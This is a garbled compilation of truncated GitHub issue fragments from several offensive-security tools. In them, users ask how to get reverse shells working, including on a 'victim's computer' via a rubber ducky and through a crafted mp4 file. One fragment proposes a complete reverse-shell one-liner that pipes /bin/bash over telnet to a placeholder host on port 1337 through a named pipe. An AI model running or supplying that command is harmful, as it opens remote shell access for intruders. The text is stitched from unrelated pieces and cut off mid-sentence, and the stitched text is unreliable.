## Bug Description
Hi, I'm trying to use pwncat-cs to be able to do a reverse shell with a rubber ducky but I can't find what command or what I have to put on the victim's computer. Do I have to …
Hi! My understanding is that hackingbuddygpt is optimized for privilege escalation so didn't need to integrate this but I think if we are going for autopentesting we need multiple terminal support for…
Cool stuff. Thank you.
Well, speaking of payloads, winexec works fine, but reverse shell (msfvenom generated) is not firing.
Anybody tried that out?
I hope I don't have to adjust Winapi paramete…
I'm running a vulnerable vm hosting Jenkings, I have access to a CLI
and use this code to execute a reverse shell successfully with nc -lvnp 4444
String host="";
int port=4444;
$ npm install -g reverse-proxy-ws
$ reverse-proxy --help
C:\Program Files\nodejs/node_modules/reverse-proxy-ws/reverse-proxy.js: line 3: import: command not found
C:\Program Files\nodejs/node_modul…
Create a reverse shell from the autopwnd boxes.
how reverse shell ????
i run cammand:
python ./metaphor.py -o nader.mp4 leak -a ????
what write -a arguments????
how reverse shell mp4 file?????
**Describe the bug**
I add a new Attack as below:
class C2TestAttackOptions(AttackOptions):
lhost = "Reverse HTTP target host or IP address"
lport = "Reverse HTTP target port"
## Reverse shell
What about a command like this to implement the reverse shell ?
/bin/mknod /ram/f p; /bin/telnet x.x.x.x 1337 < /ram/f | /bin/bash > /ram/f 2>&1
Maybe replacing telnet wi…
Windows reverse shell 好像无法上线呢 后续考虑开发这个功能嘛 大佬